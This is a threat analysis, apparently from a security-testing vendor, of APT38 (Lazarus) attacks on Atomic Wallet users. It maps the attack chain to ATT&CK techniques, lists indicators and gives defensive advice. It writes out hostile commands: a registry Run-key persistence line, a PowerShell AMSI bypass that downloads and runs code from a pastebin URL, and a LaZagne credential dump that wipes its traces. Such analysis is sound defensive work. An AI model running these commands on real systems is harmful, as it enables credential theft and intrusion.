Analysis of the Attack Script:Analysis of the Attack Script: Attack Activities of APT38 (Lazarus Group) Targeting Users of Atomic Wallet

Overview

The Lazarus Group (also known as APT38) is an Advanced Persistent Threat (APT) group associated with the North Korean government, active in the fields of cyber espionage and cybercrime. Since 2009, this group has launched multiple major cyberattacks on various industries and institutions around the world, including governments, militaries, financial institutions, the nuclear industry, the chemical industry, healthcare, aerospace, entertainment media, and the cryptocurrency industry.

This attack scenario deeply simulates the attack activities of APT38 targeting users of the Atomic Wallet service platform. It obtains initial access rights and steals sensitive data by sending phishing emails and conducting watering hole attacks on legitimate websites. We will conduct an in-depth analysis of the group’s attack techniques, tactics, and procedures (TTPs) to help security teams understand and defend against such threats.

Analysis of the Attack Chain

The attack chain of APT38 targeting Atomic Wallet users consists of seven main steps, covering the complete attack process from initial access to data theft.

The following is a detailed analysis:

Step 1: Initial Access

The Lazarus Group mainly obtains initial access rights to the target system through the following three techniques:

  1. Phishing Email – Malicious Link (T1566.002):
    1. Use multiple open redirects to hide the final phishing destination.
    2. Specific URLs use multiple redirects including those from Adobe and Twitter, and finally reach the credential collection page hosted on Microsoft Azure Blob.
    3. This technique enables attackers to hide the true final location, increasing the difficulty of detection.
  2. Phishing Email – Malicious Attachment (T1566.001):
    1. Send an email containing a malicious Word document exploiting the CVE-2021-40444 vulnerability.
    2. This vulnerability exists in the MSHTML component of Microsoft Windows Server 2022 and earlier versions.
    3. The email is usually disguised as an official document such as a small claims court notice to increase the likelihood of users opening the attachment.
  3. Watering Hole Attack – SMOOTHRIDE (T1189):
    1. Attackers hack into legitimate websites and inject iFrames, leading to the download of the SMOOTHRIDE malware.
    2. SMOOTHRIDE is a Flash loader that embeds three different exploit programs.
    3. Depending on the situation of the affected system, three different exploits are provided (CVE-2016-4119, CVE-2016-1019, or CVE-2015-8651).

Step 2: Command and Control

After successfully obtaining initial access rights, the attackers establish a command and control channel:

  1. Malicious File Transfer – Lazar Loader (T1105):
    1. This validation rule simulates the Lazar loader used to download the APT38.EXE file.
    2. Attackers exploit vulnerabilities in INISAFE CrossWeb EX and MagicLine4NX for the attack.
    3. When a user accesses a specific website containing malicious scripts on a Windows system with the vulnerable version of VestCert installed, due to the execution vulnerability of the third-party library in the VestCert software, PowerShell will be executed regardless of which web browser is used.
    4. PowerShell connects to the C2 server to download and execute malicious code.
    5. The Lazar loader loads the Lazardoor backdoor into the victim system.
  2. Command and Control – RATANKBAPOS Beacon (T1071.001):
    1. Simulate a host infected with the RATANKBAPOS variant sending a beacon to the command and control infrastructure.
    2. RATANKBAPOS is a backdoor program targeting payment card application platforms, capable of capturing track2 data and sending it to a remote C2 server.
    3. This malware can also run any command and delete itself.
    4. Use a specific User-Agent string: “Nimo Software HTTP Retriever 1.0”.
    5. Communication endpoints include domain names such as webkingston.com and energydonate.com.

Step 3: Intrusion Tool Transfer

At this stage, the attackers download additional malicious tools:

  1. Malicious File Transfer – BEAPY Credential Dumper (T1105):
    1. BEAPY is a network worm that spreads through SMB (TCP/445) or MS SQL (TCP/1433) and the MS17-010 SMB vulnerability.
    2. Use EternalBlue to attack vulnerable computers.
    3. After a successful attack, first run a PowerShell script as a downloader to obtain the main BEAPY payload.
  2. Malicious File Transfer – RATANKBAPOS Download (T1105):
    1. Download multiple variants of the RATANKBAPOS malware.
    2. These variants are all backdoor programs targeting payment card application platforms.
    3. Capable of capturing track2 data and sending it to a remote C2 server.
    4. Can execute arbitrary commands and delete itself.

Step 4: Persistence

The attackers establish persistence in the system through the following methods:

  1. Protected Sandbox – HERMES.RADICAL Execution (T1204.002):
    1. HERMES.RADICAL is a variant of the HERMES ransomware that does not contain a ransom notification.
    2. It is designed to create a distraction and destroy evidence while disguising itself as a ransomware attack.
    3. The actual command execution observed:
    4. Associated file hash value: b27881f59c8d8cc529fa80a58709db36
  2. Registry Run Key Persistence (T1547.001):
    1. HERMES.RADICAL maintains persistence by adding itself to the Run registry key. Example command:
REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\Documents\hermes.exe"
  • Associated file hash values: HERMES.RADICAL (b27881f59c8d8cc529fa80a58709db36) and RATANKBAPOS (944439b6693b0589ae73421c0a342d8a)

Step 5: Credential Access

The attackers attempt to obtain various credentials. The following are the actual command executions observed:

  1. Operating System Credential Dump (T1003):
    1. Use obfuscated LaZagne and WinPwn tools to dump credentials. The actual commands are as follows:
powershell.exe -c $ep=Get-ExecutionPolicy;If ($ep -ne 'Unrestricted') {Set-ExecutionPolicy Unrestricted -Scope Process -Force};$ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$ZQ4OhIGp4X = "c0JCuHK6";$XrCXKEDyAY = "tEa3g77g";$sP0 = "https://pastebin.com/raw/Lna2ggwB";$YdFn9 = "C:\Users\Public\Documents";$WinPwn = "iex (iwr $sP0 -UseBasicParsing);Invoke-WinPwn -Localrecon"iex $WinPwn
  • LaZagne is an open-source tool that can be used to recover passwords stored on the system.
  1. Insecure Credential Collection (T1552):
    1. Use the Ldapquery tool to collect domain credentials written in the object description:
    2. This tool specifically queries LDAP directories for objects containing the “password” field.
    3. Related file hash: e4c17fd72325c22b546e61a6d46eff1c
  2. Obtain Credentials from Password Storage (T1555):
    1. Use the LaZagne tool to dump saved email credentials:

C:\Users\Public\Documents\lazagne.exe mailsdir & rd /s /q C:\Users\Public\Documents

  • This command specifically targets stored email credentials and deletes the tool traces after completion.
  • Related file hash: 68d3bf2c363144ec6874ab360fdda00a
  1. Steal Application Access Tokens (T1528):
    1. The actual command to extract credentials from the WinSCP application:
    2. The SharpDecryptPwd tool specifically targets the credentials saved by WinSCP.
    3. This tool extracts the hostname, username, etc. from the registry path HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions.
    4. Use a custom algorithm for bitwise operations and XOR operations, parse the encrypted data byte by byte, and reconstruct the complete password.
    5. Applicable to credential extraction for WinSCP version 6.3.5.

Step 6: Lateral Movement

The attackers attempt to move laterally within the network:

  1. Pass the Ticket (T1550.003):
    1. Use the obtained Kerberos ticket to authenticate another host.
    2. Dump credentials on the infected host using tools such as MIMIKATZ.
  2. Network Service Discovery (T1046):
    1. Use Nmap for AD enumeration via NTLM.
    2. NTLM authentication negotiation may disclose information about the server’s Active Directory environment.
  3. Account Discovery (T1087):
    1. Use Nmap to execute the “SMB-enum-domains” scan.
    2. Enumerate Active Directory domains and their related policies.
  4. Dictionary Scan (T1595.003):
    1. Use Nmap and the Nmap Script Engine to brute-force FTP servers with common username and password lists.
  5. Lateral Tool Transfer (T1570):
    1. Use PsExec to transfer the ROBBINHOOD ransomware to another host and execute it.
    2. PsExec is a Windows Sysinternals tool that allows programs to be executed on remote systems.
    3. Since PsExec is a legitimate Microsoft management tool, it is less likely to be detected by antivirus tools.

Step 7: Exfiltration

Finally, the attackers collect and steal sensitive data:

  1. Collect Data from the Local System (T1005):
    1. Use the find-str command to retrieve files named password, wallet, crypt, and key.
  2. Find Credentials in Files (T1552.001):
    1. Use PowerShell to identify sensitive data on the local drive.
    2. Locate sensitive strings such as “juicypassword” in the C:\Users directory.
  3. Archive the Collected Data (T1560):
    1. Name the leaked archive file Windows Update.
    2. Name the leaked file in a format similar to Windows Update (KB) or matching KB<number>.zip.
  4. Use PowerShell FTP Upload (T1560):
    1. Use PowerShell to exfiltrate data via FTP.
    2. Connect to a remote FTP server to upload the stolen data.

Detection and Mitigation Recommendations

Based on the analysis of APT38’s attack techniques, we recommend that security teams give priority to the following detection and mitigation measures:

1.Intrusion Tool Transfer Detection (T1105)

APT38 heavily relies on downloading additional stages of malware. Both endpoint and network security controls should be deployed simultaneously to attempt to detect the transfer of these malicious payloads.

Detection Example

Detect the characteristics of using native tools to download malicious payloads:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

Mitigation Measures

  • Implement a Network Intrusion Prevention System (NIPS).
  • Conduct in-depth inspection of network traffic.
  • Limit unnecessary outbound connections.

2.Credential Access Protection

APT38 actively searches for and steals various types of credentials, especially cryptocurrency wallet credentials.

Detection Example

Monitor the following activities:

  • The use of the LaZagne tool.
  • Execution of PowerShell scripts for credential dumping.
  • Registry access to locations where known credentials are stored.

Mitigation Measures

  • Implement a strong password policy.
  • Use multi-factor authentication.
  • Limit privileged accounts.
  • Use a PAM (Privileged Account Management) solution.

3.Lateral Movement Protection

Prevent attackers from moving laterally within the network:

Detection Example

  • Monitor changes in the connection patterns of active sessions.
  • Detect suspicious service creation or remote execution.
  • Monitor specific techniques such as Pass the Ticket.

Mitigation Measures

  • Network segmentation.
  • Implement the principle of least privilege.
  • Use advanced endpoint protection solutions.

4.Command and Control Communication Detection

Identify communication with known C2 servers:

Detection Example

  • Monitor specific User-Agent strings: “Nimo Software HTTP Retriever 1.0”.
  • Detect suspicious HTTP request patterns.
  • Identify uncommon data transfer patterns.

Mitigation Measures

  • Implement DNS filtering.
  • Configure firewall rules.
  • Deploy an advanced threat protection system.

Conclusion

The attacks by APT38 (Lazarus Group) targeting users of the Atomic Wallet service platform demonstrate the group’s advanced technical capabilities and diverse attack techniques. The group comprehensively uses various techniques such as phishing attacks, watering hole attacks, and malware propagation, and conducts targeted attacks on cryptocurrency users.

By deeply understanding the tactics, techniques, and procedures (TTPs) of such attacks, security teams can better identify possible indicators of intrusion and implement appropriate defensive measures. Continuous security awareness training, timely system patch updates, robust authentication mechanisms, and comprehensive monitoring strategies are the keys to defending against such advanced threats.

The Atlas Security Validation Platform can help organizations test the effectiveness of their security defenses, identify potential defense weaknesses, and improve the overall capability of the security defense system by simulating such attack scenarios. Through continuous testing and improvement, organizations can better cope with the attack challenges posed by advanced threat groups such as APT38.